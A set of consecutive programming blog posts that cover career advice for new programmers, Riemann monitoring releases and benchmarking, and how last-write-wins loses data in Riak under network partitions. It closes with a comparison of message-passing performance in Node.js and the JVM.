When you start programming, your thoughts will be small and concrete, just like in any new language. As you grow, you'll start to solve bigger problems, more abstract problems. Every language has a sort of… abstraction ceiling, above which you can't express ideas directly. For instance, English will let you define new names for objects you haven't encountered before. German will let you generate compound verbs, but in practical terms English and German are roughly equivalent in descriptive power; they just approach the problem differently. Most computer languages are like that. Lisp… lets you invent new grammar on the fly.

That said, there aren't many folks hiring in Clojure or other Lisps, though they are out there and the jobs are cool. I recommend playing with it, if you have the time.

Most modern languages are very similar. Ruby, Python, Perl, PHP, Java, and C are all Germanic, insofar as they share close conceptual ancestors. There are whole other families of languages out there which you should be aware of, analogous to Japanese or Arabic, though not many people are using them. In particular, Haskell and OCaml are strongly typed functional languages which look quite different from any other–and have a higher abstraction ceiling. Erlang is a functional distributed language where code can live across many computers at once. If you choose to pursue these sorts of languages it can be extremely rewarding (and make you an excellent programmer), but you may have to study for longer before finding a job.

A hypothetical first job

You'll start learning a language, and gain experience with the fundamental tools. Over time you'll build a project that drives you to learn specific libraries for a task, like drawing pictures, storing data, or serving web pages. As you gain confidence you'll start writing code that exemplifies your style and skill. All your projects are published on Github. Nobody notices.

When you feel ready, start putting out feelers. Your portfolio has a few small projects–maybe demos, maybe libraries–which show your ability to write clear, documented, testable code. You start sending your resume around, and link to your github account. Folks read the code, and see potential.

You land a job at a small startup, and fumble your way through a million things nobody thought to tell you. You feel useless for a bit, but start to catch on. In a month (heck, maybe your first day) your first code hits production, and something you built is on the screen for ten thousand users. The problems at your job spur you to learn new libraries, algorithms, and languages. You write some code to help talk to a natural language parsing service, and your boss says sure, throw it up on github.

From there it sort of cascades. As your open-source profile grows in quality and reach, more people will start to take notice of your code. Maybe you get a promotion internally, or move to another company. You'll have the latitude to branch out a fair bit at a startup, and learn from your peers.

OK, get to the chase, Kyle!

Option A: Towards frontend development.

You and I write a tiny web site together, tomorrow. Something super basic, like a notepad. We can get you started with Ruby as a language, Sinatra for a server framework, and HTML+CSS to show the page. Should only take a hundred lines or so, and you'll have a skeleton to start exploring on your own. You'll get an overview of the “full stack” from frontend to backend, and version control. On the other hand, you'll be learning three distinct languages at once, which can get confusing. Testing frontends is extremely challenging, so we won't discuss that aspect much. On the plus side, you can see the results in the browser, which can feel great.

Option B: Towards backend development.

We work through some Project Euler problems together. They're bite-size math problems and each has a single answer, so there are clear goals and you get the satisfaction of solving each in turn. They start easy and get harder, and introduce you to powerful techniques along the way. We can use any language, but I'd recommend Clojure or Ruby. This path would introduce you to testing, algorithms, debugging… the process of problem solving in code. You only have to learn one language, which can give you a leg up on tackling A later. It'll push you to deeply understand a given language and advanced techniques.

Option C: Build something you care about.

Take any problem you think is interesting. Make it personal. Doesn't matter if anyone else cares, you just need something that'll drive you to think about and solve it. Maybe you want to… translate Latin texts automatically, make a chat client, plot your weight, index papers, make a videogame… whatever. I'll help you design a solution in any language.

And of course you can switch between these whenever you get bored. All of these paths will broaden over time and introduce you to the language and techniques you'll need for a job.

–Kyle

Schadenfreude is a benchmarking tool I'm using to improve Riemann. Here's a profile generated by the new riemann-bench, comparing a few recent releases in their single-threaded TCP server throughput. These results are dominated by loopback read latency–maxing out at about 8-9 kiloevents/sec. I'll be using schadenfreude to improve client performance in high-volume and multicore scenarios.

throughput.png

I needed a tool to evaluate internal and network benchmarks of Riemann, to ask questions like

  • Is parser function A or B more efficient?
  • How many threads should I allocate to the worker threadpool?
  • How did commit 2556 impact the latency distribution?

In dealing with “realtime” systems it's often a lot more important to understand the latency distribution than a single throughput figure, and for GC reasons you often want to see a time dependence. Basho Bench does this well, but it's in Erlang, which rules out microbenchmarking of Riemann functions (e.g. at the repl). So I've hacked together this little thing I'm calling Schadenfreude (from German: “happiness at the misfortune of others”). Sums up how I feel about benchmarks in general.

; A run is a benchmark specification. :f is the function we're going to
; measure--in this case, counting using
;
; 1. an atomic reference
; 2. unordered (commute) transactions
; 3. ordered (alter) transactions.
;
; :before and :after are callbacks to set up and tear down for the test run.
(let [runs [(let [a (atom 0)]
              {:name   "atoms"
               :before #(reset! a 0)
               :f      #(swap! a inc)})
            (let [r (ref 0)]
              {:name   "commute"
               :before #(dosync (ref-set r 0))
               :f      #(dosync (commute r inc))})
            (let [r (ref 0)]
              {:name   "alter"
               :before #(dosync (ref-set r 0))
               :f      #(dosync (alter r inc))})]

      ; For these benchmarks, we'll prime the JVM by doing the test twice and
      ; discarding the first one's results. We'll run each benchmark 10K times.
      runs (map #(merge % {:prime true :n 10000}) runs)

      ; And we'll try each one with 1 and 2 threads.
      runs (mapcat (fn [run]
                     (map (fn [threads]
                            (merge run {:threads threads
                                        :name    (str (:name run) " " threads)}))
                          [1 2]))
                   runs)

      ; Actually run the function and collect data.
      runs (map record runs)

      ; And plot the results together.
      plot (latency-plot runs)]

  ; For this one we'll use a log plot.
  (.setRangeAxis (.getPlot plot)
                 (org.jfree.chart.axis.LogarithmicAxis. "Latency (s)"))
  (view plot))

latency.png

When I have something usable outside a REPL I'll publish it to clojars and github. Right now I think the time alignment looks pretty dodgy so I'd like to normalize it correctly, and figure out what exactly “throughput” means. Oh, and the actual timing code is completely naive: no OS cache drop, no forced GC/finalizers, etc. I'm gonna look into tapping Criterium's code for that.

Ready? Grab the tarball or deb from http://aphyr.github.com/riemann/

0.1.3 is a consolidation release, comprising 2812 insertions and 1425 deletions. It includes numerous bugfixes, performance improvements, features–especially integration with third-party tools–and clearer code. This release includes the work of dozens of contributors over the past few months, who pointed out bugs, cleaned up documentation, smoothed over rough spots in the codebase, and added whole new features. I can't say thank you enough, to everyone who sent me pull requests, talked through designs, or just asked for help. You guys rock!

I also want to say thanks to Boundary, Blue Mountain Capital, Librato, and Netflix for contributing code, time, money, and design discussions to this release. You've done me a great kindness.

Bugfixes

  • streams.tagged-all and tagged-any can take single strings now, not just vectors of tags to match.
  • bin/riemann scripts exec java now, instead of launching in a subprocess.
  • Servers bind to 127.0.0.1 by default, instead of (possibly) ipv6 localhost only.
  • Fixed the use of the obsolete :metric_f in the default package configs.
  • Thoroughly commented and restructured the default configs to address common points of confusion.
  • Deb packages will not overwrite /etc/riemann/riemann.config by default, but consider it a conffile.

Major features

  • Librato metrics adapter is now built in.
  • riemann.graphite includes a graphite server which can accept events sent via the graphite protocol.
  • Scheduled tasks are more accurate and consume fewer threads. Riemann's clock can switch between wall-clock and virtual modes, which allows for much faster, more reliable tests.
  • Unified stream window API provides fixed and moving windows over time and events.
  • riemann.time: controllable centralized clocks and task schedulers.
  • riemann.pool: a threadsafe fixed-size bounded-latency regenerating resource pool.

New streams

  • where*: like where, but takes a function instead of an expression.
  • smap: streaming map.
  • sreduce: streaming reduce.
  • fold-interval: reduce over time periods.
  • fixed-time-window: stream which passes on a set of events every n seconds.
  • fixed-event-window: pass on sets of every n disjoint events.
  • moving-time-window: pass on the last n seconds of events.
  • moving-event-window: pass on the last n events.

Enhancements

  • (where) can take an (else) clause for streams which are called when the expression does not match a given event.
  • Converted useless multimethods to regular methods.
  • TCP and UDP servers are roughly 15% faster.
  • New Match protocol for matching predicates like functions, values, and regexes. Used in (where) and (match).
  • streams/match is simpler and more powerful, thanks to Match.
  • Numerous concurrency improvements.
  • Pagerduty adapter is included in config by default.
  • Graphite adapter includes a connection pool, reconnects properly, bounded latency.
  • Email formatting shows more state information in the body.
  • Indexes are seqable.
  • Travis-CI support.
  • Unified protocol buffer parsing paths.
  • Clearer, faster tests, especially in streams.
  • New tasks for packaging under lein2.

Experimental

  • riemann.deps provides an experimental dependency resolver. API subject to change. If you're working with dependent services in Riemann, I'd like your feedback.

What's next for Riemann?

We have quite a few new features in riemann-tools master, so that release should be coming up shortly. The dashboard is in a poor state right now, halfway between old-and-nextgen interfaces: I need to reach feature parity with the old UI and finish styling, then make a release of riemann-dash. I'm also going to rework the web site to be friendlier to beginners, and add a howto section with cookbook-style directions for solving specific problems in Riemann.

In Riemann itself, I have plans to improve Netty performance, and I want to write some Serious Benchmarks to explore concurrency tuning. After that I plan to tackle a Big Project: either persistent indexes or high availability. Those two features will comprise 0.1.4 and 0.1.5.

If you're interested in funding any of this work, please let me know. :)

For the last three years Riemann (and its predecessors) has been a side project: I sketched designs, wrote code, tested features, and supported the community through nights and weekends. I was lucky to have supportive employers which allowed me to write new features for Riemann as we needed them. And yet, I've fallen behind.

Dozens of people have asked for sensible, achievable Riemann improvements that would help them monitor their systems, and I have a long list of my own. In the next year or two I'd like to build:

  • Protocol enhancements: high-resolution times, groups, pubsub, UDP drop-rate estimation
  • An expanded websockets dashboard
  • Index state that persists through restarts
  • Expanded documentation
  • Configuration reloading
  • SQL-backed indexes for faster querying and synchronizing state between multiple Riemann servers
  • High-availability Riemann clusters using Zookeeper
  • Some kind of historical data store, and a query interface for it
  • An order-of-magnitude improvement in throughput

I believe that Riemann has great potential to help others understand and monitor their infrastructure–and as an open-source author I can think of no higher goal than to make this possible. I'm going to work full-time on Riemann for the foreseeable future.

I live in San Francisco. My burn rate (rent, utilities, insurance, and food) is roughly $2800 per month. I made 110K for some time and saved well, so I'm extending myself a $5000 gift: to do what I love, and what I think is important. I'll work on Riemann every day, and get as far as I can. I'll write new documentation and review the rapidly expanding body of pull requests from great contributors like Pyr, Banjiewen, and Perezd. I'll provide full-time support on Freenode (#riemann) and on the mailing list, and meet with users to figure out how I can help them best.

If Riemann has been of value to you or your team, and you'd like to support the project, you can help in three ways:

  1. Volunteer. I need your feature requests, your howto guides, your failing tests, your bugfixes and features. I'll do my best to give every one of them my full consideration.

  2. Employ me. I've been honored to receive some really cool job offers in the past few days, but I also plan to take my time. I want to work with intelligent, creative, and down-to-earth people, in high-level languages, and devote at least half of my time to working on Riemann. If you think your team might be a good fit, and you want direct influence over the project's direction, please get in touch.

  3. Donate money. With funding, I can work on Riemann for longer. If you just want to say “thanks”, that's great. If you need a particular capability, want to build a new visualization for your dash, or would like help integrating Riemann into your stack, you can earmark your donation and I'll devote my full attention to your goal. I can work closely with your team, either in-person or remote. I'm happy to sign any NDAs required, so long as functionality that would help everyone is published in the open-source Riemann projects. Either way, I'll thank you as a sponsor in the Riemann documentation and web site.

To give employers a reasonable timetable for hiring me, I'll only accept a few weeks of earmarked donations at a time, or agree to refund a prorated amount if I accept a job offer. If there's significant interest in funding Riemann independently, I'll block off longer stretches of time.

Let me know what you think: aphyr@aphyr.com.

library.jpg

Write contention occurs when two people try to update the same piece of data at the same time.

We know several ways to handle write contention, and they fall along a spectrum. For strong consistency (or what CAP might term “CP”) you can use explicit locking, perhaps provided by a central server; or optimistic concurrency where writes proceed through independent transactions, but can fail on conflicting commits. These approaches need not be centralized: consensus protocols like Paxos or two-phase-commit allow a cluster of machines to agree on an isolated transaction–either with pessimistic or optimistic locking, even in the face of some failures and partitions.

On the other end of the spectrum are the AP solutions, where both writes are accepted, but are resolved at a later time. If the resolution process is monotonic (always progresses towards a stable value regardless of order), we call the system “eventually consistent”. Given sufficient time to repair itself, some correct value will emerge.

What kind of resolution function should we use? Well our writes happen over time, and newer values are more correct than old ones. We could pick the most recently written value, as determined by a timestamp. Assuming our clocks are synchronized more tightly than the time between conflicting writes, this guarantees that the last write wins.

But wait! If I’m storing a list of the 500,000 people who follow, say, @scoblizer, and two people follow him at the same time… and last-write-wins chooses the most recently written set of followers… I’ll have lost a write! That’s bad! It’s rare–at Showyou we saw conflicts in ~1% of follower lists–but it still disrupts the user experience enough that I care about solving the problem *correctly*. My writes should never be lost so long as Riak is doing its thing.

Well, Riak is naturally AP, and could accept both writes simultaneously, and you could resolve them somehow. OR-sets are provably correct, fit quite naturally to how you expect following to work, and reduce the probability of any contention to single elements, rather than the entire set. But maybe we haven’t heard of CRDTs yet, or thought (as I did for some time) that 2P sets were as good as it gets. That’s OK; CRDTs have only been formally described for a couple of years.

Serializing writes with mutexes

So what if we used locking on top of Riak?

Before writing an object, I acquire a lock with a reliable network service. It guarantees that I, and I alone, hold the right to write to /followers-of/scoblizer. While holding that lock, I write to Riak, and when the write is successful, I release the lock. No two clients write at the same time, so write contention is eliminated! Our clocks are tightly synchronized by GPS or atomic clocks, and we aggressively monitor clock skew.

This does not prevent write contention.

When we issue a write to Riak, the coordinating node–the one we’re talking to as a client–computes the preflist for the key we’re going to write. If our replication factor N is 3, it sends a write to each of 3 vnodes. Then it waits for responses. By default it waits for W = (N/2 + 1) “write confirmed” responses, and also for DW = (N/2 + 1) confirmations that the write is saved on disk, not just in memory. If one node crashes, or is partitioned during this time, our write still succeeds and all is well.

That’s OK–there was no conflict, because the lock service prevented it! And our write is (assuming clocks are correct) more recent than whatever that crashed node had, so when the crashed node comes back we’ll know to discard the old value, the minority report. All we need for that is to guarantee that every read checks at least R = (N/2 + 1) copies, so at least one of our new copies will be available to win a conflict resolution. If we ever read with R=1 we could get that solitary old copy from the failed node. Maybe really old data, like days old, if the node was down for that long. Then we might write that data back to Riak, obliterating days worth of writes. That would definitely be bad.

OK, so read with quorum and write with quorum. Got it.
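That default majority rule is simple enough to sketch. Here's a tiny illustration in Python; the names are mine, not Riak's API:

```python
# Riak-style majority quorum: a strict integer majority of N replicas.
def quorum(n):
    return n // 2 + 1

N = 3                   # replication factor
W = DW = R = quorum(N)  # write, durable-write, and read thresholds

assert W == 2
# With N=3 and W=DW=R=2, a single crashed or partitioned vnode still
# leaves enough responders for both writes and quorum reads to succeed.
```

The point of choosing a majority on both sides is that R + W > N, so any quorum read must overlap any quorum write in at least one vnode–as long as the responding vnodes are the real primaries.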

Partitions

What if that node failed to respond–not because it crashed–but because of a partition? What if, on the other side of the network curtain, there are other parts of our app also trying to add new followers?

Let’s say we read the value “0”, and go to write version “1”. The riak coordinator node completes two writes, but a partition occurs and the third doesn’t complete. Since we used W=quorum, this still counts as success and we think the write completed.

Meanwhile, Riak has detected the partition, and both sides shuffle new vnodes into rotation to recover. There are now two complete sets of vnodes, one on each side. Clients talking to either side will see their writes succeed, even with W=DW=quorum (or W=all, for that matter).

When the partition is resolved, we take the most recent timestamp to decide which cluster’s copy wins. All the writes on the other side of the partition will be lost–even though we, as clients, were told they were successful. W & DW >= quorum is not sufficient; we need PW >= quorum to consider writes to those fallback copies of vnodes as failures.

Well that tells the client there was a failure, at least. But hold on… those fallback vnodes still accepted the writes and wrote them down dutifully. They’re on disk and are just as valid as the writes on the “majority” side of the partition! We can read them back immediately, and when the partition is resolved those “failed” writes have a ~1 in 2 chance (assuming an even distribution of writes between partitions) of winning last-write-wins–again, obliterating writes to the primary vnodes which were claimed to be successful! Or maybe the majority side was more recently written, and the minority writes are lost. Either way, we are guaranteed to lose data.

Nowhere in the above scenario did two writes have to happen “simultaneously”. The locking service is doing its job and keeping all writes neatly sequential. This illustrates an important point about distributed systems:

“Simultaneous” is about causality, not clocks.

The lock service can only save us if it knows the shape of the partition. It has to understand that events on both sides of the partition happen concurrently, from the point of view of Riak, and to grant any locks to the minority side would no longer provide a mutual exclusion of writes in the logical history of the Riak object.

The lock service, therefore, must be distributed. It must also be isomorphic to the Riak topology, so that when Riak is partitioned, the lock service is partitioned in the same way; and can tell us which nodes are “safe” and which are “dead”. Clients must obtain locks not just for keys, but for hosts as well.

One way to provide these guarantees is to build the locking service into Riak itself: jtuple has been thinking about exactly this problem. Alternatively, we could run a consensus protocol like Zookeeper on the Riak nodes and trust that partitions will affect both kinds of traffic the same way.

So finally, we’ve succeeded: in a partition, the smaller side shuts down. We are immediately Consistent and no longer Available, in the CAP sense; but our load balancer could distribute requests to the majority partition and all is well.

What’s a quorum, anyway?

OK, so maybe I wasn’t quite honest there. It’s not clear which side of the partition is “bigger”.

Riak has vnodes. Key “A” might be stored on nodes 1, 2, and 3, “B” on 3, 4, and 5, and “C” on 6, 7, and 8. If a partition separates nodes 1-4 from 5-8, nodes 1-4 will have all copies of A, two of B, and none of C. There are actually M ensembles at work, where M = ring_size. Riak will spin up fallback vnodes for the missing sections of the ring, but they may have no data. It’s a good thing we’re using PR >= quorum, because if we didn’t, we could read an outdated copy of an object–or even get a not_found when one really exists!

This is absolutely critical. If we read a not_found, interpret it as an empty set of followers, add one user, and save, we could obliterate the entire record when the partition resolves–except for the single user we just added. A half-million followers gone, just like that.

Since there are M ensembles distributed across the partition in varying ways, we can’t pick an authoritative side to keep running. We can either shut down entirely, or allow some fraction of our requests (depending on the ring size, number of nodes, and number of replicas, and the partition shape) to fail. If our operations involve touching multiple keys, the probability of failure grows rapidly.
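A back-of-the-envelope sketch of that last claim, with a purely illustrative per-key failure probability:

```python
# Assume a partition leaves each key's quorum unreachable with
# independent probability p; an operation touching k keys fails
# if any single key does. (p = 0.2 is made up for illustration.)
def multi_key_failure(p, k):
    return 1 - (1 - p) ** k

p = 0.2
for k in (1, 2, 5, 10):
    print(k, round(multi_key_failure(p, k), 3))
# With p = 0.2, failure climbs from 0.2 at one key to ~0.89 at ten.
```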

This system cannot be said to be highly available, even if the coordination service works perfectly. If more than N/2 + 1 nodes are partitioned, we must fail partly or completely.

In fact, strictly speaking, we don’t even have the option of partial failure. If the cluster partitions after we read a value, a subsequent write will still go through to the fallback vnodes and we have no way to stop ourselves. PW doesn’t prevent writes from being accepted; it just returns a failure code. Now our write is sitting in the minority cluster, waiting to conflict with its sibling upon resolution.

The only correct solution is to shut down everything during the partition. Assuming we can reliably detect the partition. We can do that, right?

Partitions never happen!

It’s not like partitions happen in real life. We’re running in EC2, and their network is totally reliable.

OK so we decide to move to our own hardware. Everything in the same rack, redundant bonded interfaces to a pair of fully meshed agg switches, redundant isolated power on all the nodes, you got it. This hardware is bulletproof. We use IP addresses so DNS faults can’t partially partition nodes.

Then, somehow, someone changes the Erlang cookie on a node. OK, well now we know a great way to test how our system responds to partitions.

Our ops team is paranoid about firewalls. Those are a great way to cause asymmetric partitions. Fun times. After our hosting provider’s support team fat-fingered our carefully crafted interface config for the third time, we locked them out of the OS. And we replaced our Brand X NICs with Intel ones after discovering what happens to the driver in our particular kernel version under load.

We carefully isolate our Riak nodes from the app when restarting, so the app can’t possibly write to them. It’s standard practice to bring a node back online in isolation from the cluster, to allow it to stabilize before rejoining. That’s a partition, and any writes during that time could create havoc. So we make sure the app can’t talk to nodes under maintenance at all; allow them to rejoin the cluster, perform read-repair, and then reconnect the clients.

Riak can (in extreme cases) partition itself. If a node hangs on some expensive operation like compaction or list-keys, and requests time out, other nodes can consider it down and begin failover. Sometimes that failover causes other timeouts, and nodes continually partition each other in rolling brownouts that last for hours. I’m not really sure what happens in this case–whether writes can get through to the slow nodes and cause data loss. Maybe there’s a window during ring convergence where the cluster can’t decide what to do. Maybe it’s just a normal failure and we’re fine.

Recovery from backups is a partition, too. If our n_val is 3, we restore at most one node at a time, and make sure to read-repair every key afterwards to wipe out that stale data. If we recovered two old nodes (or forgot to repair every key on those failed nodes), we could read 2 old copies of old data from the backups, consider it quorum, and write it back.

I have done this. To millions of keys. It is not a fun time.

The moral of these stories is that partitions are about lost messages, not about the network; and they can crop up in surprisingly sneaky ways. If we plan for and mitigate these conditions, I’m pretty confident that Riak is CP. At least to a decent approximation.

Theory

You know, when we started this whole mess, I thought Riak was eventually consistent. Our locking service is flawless. And yet… there are all these ways to lose data. What gives?

Eventually consistent systems are monotonic. That means that over time, they only grow in some way, towards a most-recent state. The flow of messages pushes the system inexorably towards the future. It will never lose our causal connection to the past, or (stably) regress towards a causally older version. Riak’s use of vector clocks to identify conflicts, coupled with a monotonic conflict-resolution function, guarantees our data will converge.

And Last Write Wins is monotonic. It’s associative: LWW(a, LWW(b, c)) = LWW(LWW(a, b), c). It’s commutative: LWW(a, b) = LWW(b, a). And it’s idempotent: LWW(LWW(a)) = LWW(a). It doesn’t matter what order versions arrive in: Riak will converge on the version with the highest timestamp, always.
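Those three properties are easy to check mechanically. Here's a minimal LWW merge over (timestamp, value) pairs; my sketch, not Riak's implementation:

```python
# Last-write-wins as a merge function over (timestamp, value) pairs.
def lww(a, b):
    # Converge on whichever version carries the higher timestamp.
    return a if a[0] >= b[0] else b

a, b, c = (1, "old"), (2, "mid"), (3, "new")

assert lww(a, lww(b, c)) == lww(lww(a, b), c)  # associative
assert lww(a, b) == lww(b, a)                  # commutative
assert lww(a, a) == a                          # idempotent
# Order-independent convergence... and (1, "old") is destroyed forever.
assert lww(a, c) == (3, "new")
```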

The problem is that LWW doesn’t fit with our desired semantics. These three properties guarantee monotonicity, but don’t prevent us from losing writes. f(a, b) = 0 is associative, commutative, and idempotent, but obviously not information-preserving. Like burning the Library at Alexandria, Last Write Wins is a monotonic convergence function that can destroy knowledge–regardless of order, the results are the same.

Conclusions

Last-write-wins is an appropriate choice when the client knows that the current state is correct. But most applications don’t work this way: their app servers are stateless. State, after all, is the database’s job. The client simply reads a value, makes a small change (like adding a follower), and writes the result back. Under these conditions, last-write-wins is the razor’s edge of history. We cannot afford a single mistake if we are to preserve information.

What about eventual consistency?

If we had instead merged our followers list with set union, every failure mode I’ve discussed here disappears. The system’s eventual consistency preserves our writes, even in the face of partitions. You can still do deletes (over some time horizon) by using the lock service and a queue.

We could write the follower set as a list of follow or unfollow operations with timestamps, and take the union of those lists on conflict. This is the approach provided by statebox et al. If the timestamps are provided by the coordination service, we recover full CP semantics, apparent serializability, and Riak’s eventual consistency guarantees preserve our writes up to N-1 failures (depending on r/pr/w/pw/dw choices). That system can also be highly available, if paths to both sides of the partition are preserved and load balancers work correctly. Even without a coordination service, we can guarantee correctness under write contention to the accuracy of our clocks. GPS can provide 100-nanosecond-level precision. NTP might be good enough.
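A sketch of that op-log idea, statebox-style but with hypothetical names (this is not the statebox API):

```python
# Each write appends a (timestamp, op, user) tuple; conflicting replicas
# merge by set union, which is monotonic and discards nothing.
def merge(log1, log2):
    return log1 | log2

def followers(log):
    # Replay ops in timestamp order; the latest op per user wins.
    state = {}
    for ts, op, user in sorted(log):
        state[user] = (op == "follow")
    return {u for u, following in state.items() if following}

# Two sides of a partition accept writes independently...
side_a = {(1, "follow", "alice"), (2, "follow", "bob")}
side_b = {(1, "follow", "alice"), (3, "unfollow", "bob")}

# ...and the union preserves both histories: bob's later unfollow
# wins, and alice's follow survives.
assert followers(merge(side_a, side_b)) == {"alice"}
```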

Or you could use OR-sets. It’s 130 lines of ruby. You can write an implementation and test its correctness in a matter of days, or use an existing library like Eric Moritz' CRDT or knockbox. CRDTs require no coordination service and work even when clocks are unreliable: they are the natural choice for highly available, eventually consistent systems.
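For concreteness, here's a bare-bones OR-set sketch in Python. This is my illustration of the idea, not Eric Moritz' CRDT or knockbox:

```python
import uuid

class ORSet:
    """Observed-remove set: removes only affect adds we've actually seen."""
    def __init__(self):
        self.adds = set()      # (element, unique-tag) pairs
        self.removes = set()   # tombstoned (element, tag) pairs

    def add(self, e):
        # Every add gets a fresh tag, so concurrent adds are distinguishable.
        self.adds.add((e, uuid.uuid4().hex))

    def remove(self, e):
        # Tombstone only the tags observed locally.
        self.removes |= {(elem, t) for elem, t in self.adds if elem == e}

    def merge(self, other):
        merged = ORSet()
        merged.adds = self.adds | other.adds
        merged.removes = self.removes | other.removes
        return merged

    def value(self):
        return {e for e, _ in self.adds - self.removes}

# Concurrent follows on both sides of a partition both survive the merge.
a, b = ORSet(), ORSet()
a.add("alice")
b.add("bob")
assert a.merge(b).value() == {"alice", "bob"}
```

Because a remove can only tombstone tags it has observed, an add concurrent with a remove wins the merge: exactly the "my follow should stick" semantics we wanted, with no clocks and no coordination.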

In response to Results of the 2012 State of Clojure Survey:

The idea of having a primary language honestly comes off to me as a sign that the developer hasn’t spent much time programming yet: the real world has so many languages in it, and many times the practical choice is constrained by that of the platform or existing code to interoperate with.

I've been writing code for ~18 years, ~10 professionally. I've programmed in (chronological order here) Modula-2, C, Basic, the HTML constellation, Perl, XSLT, Ruby, PHP, Java, Mathematica, Prolog, C++, Python, ML, Erlang, Haskell, Clojure, and Scala. I can state unambiguously that Clojure is my primary language: it is the most powerful, the most fun, and has the fewest tradeoffs.

Like Haskell, I view Clojure as an apex language: the best confluence of software ideas towards a unified goal. Where Haskell excels at lazy, pure, strongly typed problems, Clojure is my first choice for dynamic, high-level, general-purpose programming. I wish it were faster, that it had a smarter compiler, that it had CPAN's breadth, that its error messages were less malevolent, that it had a strong type system for some problems. But for all this, you gain a fantastically expressive, concise, rich language built out of strikingly few ideas which lock together beautifully. It gives you a modern build system, a REPL, hot code reloading, hierarchies, parametric polymorphism, protocols, namespaces, immediate, lazy, logical, object-oriented, and functional modes, rich primitives, expressive syntax, immutable and mutable containers, many kinds of concurrency, thoughtful Java integration, hygienic and anaphoric macros, and homoiconicity.

Were Clojure to cease, I would immediately endeavor to replicate its strengths in another language. That's a primary language to me. ;-)

More from Hacker News. I figure this might be of interest to folks working on parallel systems. I'll let KirinDave kick us off with:

Go scales quite well across multiple cores iff you decompose the problem in a way that’s amenable to Go’s strategy. Same with Erlang. No one is making “excuses”. It’s important to understand these problems. Not understanding concurrency, parallelism, their relationship, and Amdahl’s Law is what has Node.js in such trouble right now.

Ryah responds:

Trouble? Node.js has linear speedup over multiple cores for web servers. See http://nodejs.org/docs/v0.8.4/api/cluster.html for more info.

It's parallel in the same sense that any POSIX program is: Node pays a higher cost than real parallel VMs in serialization across IPC boundaries, not being able to take advantage of atomic CPU operations on shared data structures, etc. At least it did last time I looked. Maybe they're doing some shm-style magic/semaphore stuff now. Still going to pay the context switch cost.

this is the sanest and most pragmatic way to serve a web server from multiple threads

Threads and processes both require a context switch, but on posix systems the thread switch is considerably less expensive. Why? Mainly because the process switch involves changing the VM address space, which means all that hard-earned cache has to be fetched from DRAM again. You also pay a higher cost in synchronization: every message shared between processes requires crossing the kernel boundary. So not only do you have a higher memory use for shared structures and higher CPU costs for serialization, but more cache churn and context switching.
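For comparison, message passing between threads in a single process never crosses an address-space boundary. A tiny Ruby sketch (purely illustrative, not the benchmark code discussed in this post): two threads exchange ten thousand integers over in-process queues, with no serialization and no write()/recvmsg() per message.

```ruby
require 'thread'

# Two threads passing integers over in-process Queues. Messages stay in
# one address space; synchronization happens on the queues themselves.
N = 10_000
ping = Queue.new
pong = Queue.new

# Echo thread: receive on ping, reply on pong.
echo = Thread.new { N.times { pong << ping.pop } }

sum = 0
N.times do |i|
  ping << i
  sum += pong.pop # full round trip per message, like an acked send
end
echo.join
# sum accumulates 0 + 1 + ... + 9999
```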

it’s all serialization - but that’s not a bottleneck for most web servers.

I disagree, especially for a format like JSON. In fact, every web app server I've dug into spends a significant amount of time on parsing and unparsing responses. You certainly aren't going to be doing computationally expensive tasks in Node, so messaging performance is paramount.

i’d love to hear your context-switching free multicore solution.

I claimed no such thing: only that multiprocess IPC is more expensive. Modulo syscalls, I think your best bet is gonna be n-1 threads with processor affinities taking advantage of cas/memory fence capabilities on modern hardware.

A Node.js example

Here are two programs, one in Node.js, and one in Clojure, which demonstrate message passing and (for Clojure) an atomic compare-and-set operation.

Node.js: https://gist.github.com/3200829

Clojure: https://gist.github.com/3200862

Note that I picked really small messages–integers–to give Node the best possible serialization advantage.

$ time node cluster.js
Finished with 10000000

real    3m30.652s
user    3m17.180s
sys     1m16.113s

Note the high sys time: that's IPC. Node also uses only 75% of each core. Why?

$ pidstat -w | grep node
12:13:24 PM       PID   cswch/s nvcswch/s  Command
11:47:47 AM     25258     48.22      2.11  node
11:47:47 AM     25260     48.34      1.99  node

100 context switches per second.

$ strace -cf node cluster.js
Finished with 1000000
% time     seconds  usecs/call     calls    errors syscall
------ ----------- ----------- --------- --------- ----------------
 97.03    5.219237          31    168670           nanosleep
  1.63    0.087698           0    347937     61288 futex
  1.01    0.054567           0   1000007         1 epoll_wait
  0.20    0.010581           0   1000006           write
  0.11    0.005863           0   1000005           recvmsg

OK, so every send requires a call to write(), and every read takes a call to epoll_wait() and recvmsg(). It takes 3.5 syscalls to send a message. We're spending a lot of time in nanosleep, and roughly 34% of messages involved futex–which I'm hoping means the Node authors did their IPC properly instead of polling streams.

[Edit: Thanks @joedamato, I was forgetting -f]

The JVM

Now let's take a look at that Clojure program, which uses 2 threads passing messages over a pair of LinkedTransferQueues. It uses 97% of each core easily. Note that the times here include ~1 second of jvm startup.

$ time java -jar target/messagepassing-0.1.0-SNAPSHOT-standalone.jar queue 10000000
"Elapsed time: 53116.427613 msecs"

real    0m54.213s
user    1m16.401s
sys     0m6.028s

Why is this version over 3 times faster? Well mostly because it's not serializing and isn't javascript–but on top of that, it causes only 11 context switches per second:

$ pidstat -tw -p 26537
Linux 3.2.0-3-amd64 (azimuth)   07/29/2012      _x86_64_        (2 CPU)

11:52:03 AM      TGID       TID   cswch/s nvcswch/s  Command
11:52:03 AM     26537         -      0.00      0.00  java
11:52:03 AM         -     26540      0.01      0.00  |__java
11:52:03 AM         -     26541      0.01      0.00  |__java
11:52:03 AM         -     26544      0.01      0.00  |__java
11:52:03 AM         -     26549      0.01      0.00  |__java
11:52:03 AM         -     26551      0.01      0.00  |__java
11:52:03 AM         -     26552      2.16      4.26  |__java
11:52:03 AM         -     26553      2.10      4.33  |__java

And queues are WAY slower than compare-and-set, which involves basically no context switching:

$ time java -jar target/messagepassing-0.1.0-SNAPSHOT-standalone.jar atom 10000000
"Elapsed time: 999.805116 msecs"

real    0m2.092s
user    0m2.700s
sys     0m0.176s

$ pidstat -tw -p 26717
Linux 3.2.0-3-amd64 (azimuth)   07/29/2012      _x86_64_        (2 CPU)

11:54:49 AM      TGID       TID   cswch/s nvcswch/s  Command
11:54:49 AM     26717         -      0.00      0.00  java
11:54:49 AM         -     26720      0.00      0.01  |__java
11:54:49 AM         -     26728      0.01      0.00  |__java
11:54:49 AM         -     26731      0.00      0.02  |__java
11:54:49 AM         -     26732      0.00      0.01  |__java

